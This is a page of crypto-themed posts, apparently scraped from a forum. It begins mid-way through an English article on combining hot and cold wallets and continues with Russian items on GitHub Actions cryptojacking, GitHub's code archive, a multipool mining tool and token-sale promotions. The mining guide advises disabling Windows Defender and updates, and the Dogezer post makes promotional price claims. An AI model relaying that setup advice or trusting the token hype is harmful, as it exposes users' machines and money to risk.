Cold Wallet Internet Connectivity Online Offline Accessibility Easily accessible Low accessibility Tangibility Software-based wallets; so, intangible Physical wallets; so, tangible Types Mobile, web or desktop wallets Paper or hardware wallets Safety Prone to hacking and attacks. So, less secure. Less threat from hacking and attacks. So, more secure Convenience Easy and convenient Less convenient Cost Less expensive More expensive Usability Best to store a small amount of crypto Best to store large amounts of cryptocurrency Hot and cold wallet setup Although using a hot wallet for transactions is easy and convenient, it cannot be used to keep a large number of cryptocurrencies due to security threats. It is advisable to store your large amount of cryptocurrencies in cold wallets as they are the least vulnerable to security threats, such as malware attacks and phishing. One important way of setting up wallets to avoid risks is to combine both hot and cold wallets, which reduces your funds’ online exposure. In this, each wallet is set up for different purposes. The hot wallets serve as the receiving wallet and sending wallet. The receiving wallet will manage the funds coming to the exchange, while the sending wallet will be used to send cryptos for transactions and trade. As both the sending and receiving wallets will be hosted on online servers, the number of funds kept in both wallets should be minimized to reduce the risks of crypto vulnerability. The rest of the cryptos should be stored in your cold wallet. Doing this can ensure that most of your asset is safe in case of any security compromises. How does hot and cold wallet interact? As all of the funds that are transferred to you come to your receiving wallet, there are chances of crypto accumulation in your receiving wallet, resulting in crypto vulnerabilities. So, you need to send most of it to the cold wallet and some to the sending wallet. You need to have a minimum amount in your receiving wallet to transfer to the sending wallet once it falls short of cryptos, and this ensures that the sending wallet has enough cryptos whenever needed. However, suppose funds are not reliably coming to the receiving wallet, and the sending wallet urgently needs currencies. In that case, you can transfer the required amount from the cold wallet to the sending wallet. How to mitigate crypto vulnerability? Assume that you have a total of 200 ETH in your possession, and at any time, you want to avoid risking more than 30% of your funds. Based on this calculation, you need to set maximum and minimum thresholds per wallet to reduce the severity of any malware attack. So, the receiving wallet should have a minimum of 10 ETH and a maximum of 20 ETH. Similarly, the sending wallet should possess at least 20 ETH and up to 40 ETH. The rest of your assets should be kept in the cold wallet. If you set a threshold for your sending and receiving wallets, adhere to it and ensure that the set amount does not exceed or drop down the limit. Excess funds are prone to vulnerabilities, and you cannot produce the required amount when needed if it is below the limit. So, always maintain an adequate amount of funds How do hot and cold wallet setups in big systems work? Hot and cold wallet setups vary, and each setup is designed based on the developer’s requirements and thought process. Through the following infographics, let us understand how hot and cold wallet setups are designed in big systems. In the above-given infographic, if a person wants to send x number of tokens to another user, they input a request in the front end of the application, which is fetched in the API layer or the backend of the app. The backend transfers the input request to the wallet server. In a typical wallet architecture, a wallet server handles multiple microservices like managing nodes, databases, APIs or transaction services. As the user input, in this case, is related to the transaction service, the request is sent to this microservice. The transaction service then sends the request to the wallet microservices, which handle all services related to the wallet. The wallet microservices can vary from platform to platform. In the above infographic, the wallet microservices include the following: Fund management for the hot wallet – It ensures that it always sticks to its threshold without crypto overflow or deficit to prevent risk exposure. Whitelisted IPs – It limits the number of people who can access your domain or server to a few trusted IP addresses permitted by you. Token – It manages and keeps track of your tokens, like x number of ETH or x number of SOL. Service monitoring – This microservice checks whether all services are working without glitches. Thresholds – These ensure that you have the required amount in your wallet or not to send it to others. 2-step authentication – It is a security process where you have to verify your identity twice before accessing the wallet ecosystem. Notifications – It alerts users on important matters like successful transaction completion notifications. KMS – Key management system or KMS helps create, store, and manage it safely. Rotate hot wallet When the transaction input is transferred from the transaction service to the wallet microservices, all of the above microservices are carried out. Once all the services are done, and it is ascertained that your hot wallet has enough number of tokens, the x number of tokens is sent to the receiver. The transaction is, then, said to be successfully completed. Conclusion Merging both hot and cold wallets can help mitigate the risk of crypto attacks for both the users and the service providers. It acts as a comfortable middle ground by offering the benefits of both wallets, where one is used for crypto trading, and the other is used to hold the cryptos safely. Even though only hot wallets were popular during the initial days of crypto emergence, usage of cold wallets is getting more popular these days. Moreover, blending hot and cold wallets is gradually gaining prominence among crypto experts and service providers, owing to its huge benefits. Using just one wallet is, thus, outdated, and people gradually realize the advantages of combining both hot and cold wallets as an additional security measure. GitHub Telegram: https://t.me/cryptodeeptech Video: https://youtu.be/NrQ3oNxlrlU Source: https://cryptodeep.ru/cold-and-hot-wallets Криптоанализ
  6. Хакеры использовали облачную инфраструктуру GitHub для скрытого майнинга криптовалют. Атака криптоджекинга проводилась с осени 2020 года и затронула функционал GitHub Actions. Служба хостинга кодов GitHub расследует серию атак на свою облачную инфраструктуру. Данные атаки позволили киберпреступникам использовать серверы компании для скрытых операций по майнингу криптовалют и были впервые обнаружены французским инженером-программистом в ноябре прошлого года. Атака криптоджекинга затронула функционал GitHub под названием GitHub Actions. Данный функционал позволяет пользователям автоматически выполнять задачи и рабочие процессы, которые запускаются определенным событием, происходящим внутри их репозиториев. Чтобы запустить программное обеспечение для майнинга криптовалют, злоумышленники проводили форк существующего репозитория, добавляли вредоносный элемент GitHub Actions к исходному коду, а затем отправляли Pull Request в исходный репозиторий, чтобы добавить измененный код обратно. Подробнее: https://bits.media/servery-github-podverglis-atake-kriptodzhekinga/
  7. Команда GitHub поместит на пленки открытые исходные коды крупнейших проектов, включая Bitcoin Core и Ethereum, и отправит их на хранение в заброшенную шахту на Шпицбергене. GitHub организует хранение открытых исходных кодов Биткоина и других криптовалютных проектов в заброшенной угольной шахте на Шпицбергене. Помещенные на хранения на глубине 250 метров архивы будут включать в себя код Bitcoin Core - наиболее популярной реализации кода базовой инфраструктуры Биткоина в одном из наиболее часто используемых репозиториев на GitHub. Репозитории криптовалютных проектов будут архивироваться вместе с исходными кодами множества других проектов различных направлений. В рамках программы архивации для защиты важной части технологической истории, «снимок» всего этого кода будет скопирован на рулоны пленки и сохранен в стальном контейнере. Все это делается для того, чтобы данные оставались в сохранности на протяжении 1000 лет. Команда GitHub в настоящее занимается подготовкой данных к хранению. Помещение архивов в хранилище запланировано на конец апреля, как сообщил изданию CoinDesk представитель GitHub. Помимо Bitcoin Core, большинство криптовалютных проектов, хранящихся на GitHub, также будут включены в архив, в том числе код Lightning Network, Ethereum и Dogecoin. Архивирование такой информации поддерживают некоммерческие организации Internet Archive и Long Now Foundation, а также историки, антропологи и другие ученые. Подробнее: https://bits.media/github-arkhiviruet-kody-kriptovalyutnykh-proektov-v-zabroshennoy-shakhte-na-shpitsbergene/
  8. Швейцарская Neurogress, разработчик скандально известного программного обеспечения для нейроконтроля над гаджетами, наконец выложила на Github исходный код своей программы. Общественности стала доступна версия интегрированная с Microsoft Windows и предназначенная для использования с обычным Neurointerface Muse. Для неопытных пользователей приводится пошаговая инструкция по установке и запуску программы.https://github.com/Neurogress/GettingDataКроме того, в компании заявили о запуске программы "NeuroContlol Customer Manual" (NCCM)/ "A Row Recruit Manual" - которая будет представлять собой совокупность видео и текстовых материалов, которые являются своего рода Руководством пользователя для всех участников экосистемы нейроуправления Neurogress.Узнать больше:https://neurogress.io/Telegram - https://t.me/neurogress Источник: https://ico-promo.livejournal.com/2549.html
  9. Fast multipool and multialgo windows miner https://github.com/1001rapid/RapidMiner Не совсем аналог, хотя, если программу использовать только на Найсе, то вполне себе аналог, плюс есть возможность использовать новые майнеры. В общем, программа для работы с мультипулами. Выбирает где копать, основываясь на данных с WTM. --==[Немного истории]==-- Во время отключения Найса, долго искал что-то похожее и случайно (по ссылке на одном из мультипулов) набрёл на замечательную программу Megaminer от Tutulino, основное её отличие от других подобных программ было то, что можно было создавать группы видеокарт, что было очень полезно не только с винегретом из них, а даже, когда все одинаковые, потому что та, которая предполагается системой для вывода изображения была намного нестабильнее остальных и для неё желательно было исключить некоторые алгоритмы, которые приводили к выносу драйверов и прочим радостям. И делало это маленькое свойств эту программу очень похожей на NiceHashMiner, в котором тоже есть замечательная возможность настроить каждую карточку отдельно. И всё бы ничего, но автор начал вводить новые функции и переработал механизм работы так, что каждый новый цикл работы майнеров начинал занимать всё больше и больше времени. От 5 до 20 минут. Это стало так раздражать, что я решил запилить свою программу. За основу взял Megaminer версии 5.0, в котором ещё присутствовал лог-файл, по сути являющийся скриншотом основного окна программы. Это очень удобно для мониторинга ферм в локальной сети - можно не заходить не компы через программы удалённого доступа, а любым консольным файловым менеджером открыть лог-файл, прокрутить в конец и наблюдать в реальном времени окно программы через текстовый файл. Вот тут показан мониторинг двух компов: Но так как новые возможности тоже хочется, то добавляю по возможности. --==[Системные требования]==-- Железо: CPU - минимум .) я использую старые материнки со всякими двух ядерными Intel и AMD HDD - от 60 Гб (оптимально 80 и больше), программа: 500 Мб + система + файл подкачки от 32 Гб RAM - 2 Гб Операционка: Я везде использую Windows 7 sp1 x64, Tutulino обкатывает на 10-ке Софт: PowerShell v5.0 CUDA 9 (некоторые майнеры его требуют, можно их исключить, если не хотите ставить последние дрова (CUDA 9 начинается в версии 387 и выше), потому что с ними обычно начинаются проблемы, к примеру, у 1050 Ti перестала отображаться текущая мощность (по моим данным, последняя стабильная версия дров для неё - 384.94)) Что я ставлю на голую 7-ку, что бы гарантированно всё работало: CCleaner (помогает при маленьких дисках) ESET Smart Security (Firewall) - включаю только защиту узла и Firewall (первый день - режим обучения) SP1 (KB976932) D3DComplier - need for NET Framework install (KB4019990) Microsoft.NET Framework 4.7 - web install (KB3186500) Microsoft Visual C++ 2005-2017 (VCredist) Update for Universal C Runtime (KB2999226) Windows Support Tools (??? какой-то майнер запрашивал) Windows Management Framework 5.0 includes updates to Windows PowerShell (KB3134760) Windows Defender выключен, обновления выклчены. --==[Установка и настройка]==-- 1. Скачивайте с https://github.com/1001rapid/RapidMiner последний релиз (зелёная кнопка "Clone or download", далее "Download ZIP" и распаковываем, скажем, в папку "RapidMiner") 2. Редактируете файл CONFIG.TXT 3. Запускаете батник. Самый простой вариант, используемый мною (все монеты в автоматическом режиме и на выбранных пулах) - _RapidMiner.bat (только пулы выберете, какие нужно). !!!Названия пулов должны быть написаны так же, как называются соответствующие файлы в папке Pools. Так же присутствуют примеры батников для соломайнинга и для добычи нескольких монет. Можно всё делать в ручном режиме, запустив START. 4. При первом запуске происходит скачивание (всё качается с GitHub) и установка майнеров. 5. При первом же запуске майнеры тестируются. Процесс долгий. Результат пишется в папку "Stats" отдельно по группам GPU, если Вы их сконфигурировали в п.2. Рекомендую этот пункт проходить для каждой группы в отдельности (т.е. активировать по одной группе), так будет легче вычислить нестабильный майнер, для исключения которого правится файл с результатами тестов, где ставиться заведомо низкая цифра. 6. Дальнейшая настройка: - майнер можно исключить совсем, удалив (а лучше переместив в папку "Additional Miners") файл из папки "Miners"; - так же можно исключить пул, удалив его файл из папки "Pools", но лучше всё же, удалить его из запускающего батника); - перед запуском майнера можно добавить запуск каких либо программ (тех же настроек), добавив командную строку в поле "PrelaunchCommand" соответствующего майнера (не всегда срабатывает, но вдруг кому то пригодится)). ------ Сразу скажу, что делаю для себя, тут решил поделиться с коллегами, вдруг кому тоже понравится, поэтому поддержка в формате "используем что есть" ), но вопросы можете задавать, по возможности, подскажу. На подходе версия 1.2 улучшенная и доработанная, пока на обкатке
  10. Golos.fund раздаёт деньги. Ищутся 100% открытый код, MVP и Graphene технологии для встраивания в блокчейн Golos Придумай, участвуй, сделай! Получи призовой фонд, который изменит твою жизнь!
  11. .Dogezer''. DoSoftwareTogether Dogezer – это платформа, которая позволяет участникам команды быть инвесторами, инвестируя свои труд и время Ссылки: website | whitepaper | prototype video | blog | twitter | facebook | slack | telegram email: community@dogezer.com Основной топик Dogezer [ENG] Баунти-кампания (основной топик) [ENG] Русскоязычный топик Dogezer [RUS] Баунти-кампания [RUS] ITO начинается 15 января 2018 ITO означает Initial Token Offering (первичное предложение токенов) ___________________________________________________________________________ Мы объединили Github, Upwork, Slack, Jira, Dropbox, Google Docs в один продукт. Мы добавили финансовую систему с возможностью создания внутрипроектной монеты. Вы создаете свой программный проект на нашей платформе и платите своей команде этим монетами, ИЛИ Вы работаете над продуктом и получаете монеты – это доля владения/дохода продукта Уникальная модель токена ___________________________________________________________________________ • DGZ-токен конвертируется в услуги платформы. • Коэффициент конверсии зависит от количества существующих DGZ-токенов. • Мы частично сжигаем DGZ-токены, когда вы используете их на платформе, конверсия растет. • Коэффициент конверсии начинается с 4x: 4-х долларовая стоимость услуг за 1 DGZ-токен ($0.7 - $1 за DGZ на ITO) Подробнее здесь: whitepaper Этапы ___________________________________________________________________________ 1 сентября: Начало PreITO 30 сентября: Окончание PreITO 15 ноября: Alpha-релиз 15 января 2018: Начало ITO 15 февраля 2018: Окончание ITO Июль 2018: Открытый Beta-релиз Декабрь 2018: Официальный релиз Dogezer 1.0 Dogezer-продукт ___________________________________________________________________________ • Продукт почти готов • Технически сильная команда • Позади год разработки • Работающая Alpha-версия - видео • Первый открытый тест в ноябре 2017 • Полнофункциональная Beta-версия в июле 2018 Dogezer ITO ___________________________________________________________________________ • Всего токенов: 100,000,000 • PreITO: 2,000,000 PreDGZ-токены за $0.7 в ETH • ITO: 96,000,000 DGZ-токены за $0.9-$1.0 в ETH • Минимальный объем: 1,000,000 USD • Доля основателей: 0.5% • Непроданные токены сгорают • Команда работает над escrow. Узнать больше сайт | whitepaper | видео прототипа блог | twitter | facebook | slack | telegram email: community@dogezer.com Основной топик Dogezer [ENG]: https://bitcointalk.org/index.php?topic=2100916.0 Баунти-кампания (основной топик) [ENG]: https://bitcointalk.org/index.php?topic=2108930.0 Баунти-кампания [RUS]: https://bitcointalk.org/index.php?topic=2113938.0 Присоединяйтесь к нашему slack чтобы быть в курсе Будем рады ответить на все ваши вопросы!
  12. Разработчик ПО WhisperSystems объявил об интеграции Bitcoin с известным любому программисту ресурсом GitHub, на котором размещается множество проектов по разработке open-source программ. Интеграция будет реализована в виде сервиса BitHub, который предложит open-source разработчикам за участие в проектах компании оплату в биткойнах. WhisperSystems разрабатывает бесплатные приложения для шифрования хранилищ, сообщений и звонков на платформах Apple и Android. Все эти приложения с открытым кодом, хранящиеся в публичных репозиториях. Заинтересованные в таких приложениях пользователи сами финансируют их разработку. Поэтому компания решила ввести поддержку пожертвований в Bitcoin, так как они анонимны и не требуют соблюдения формальностей, связанных с платежами например в долларах. На BitHub так же можно будет направить пожертвования конкретному проекту и увидеть, на что именно они израсходованы. Возможно, в будущем на BitHub смогут размещаться и независимые проекты. Источник: http://www.coindesk.com/bithub-pays-open-source-developers-bitcoin
×
×
  • Создать...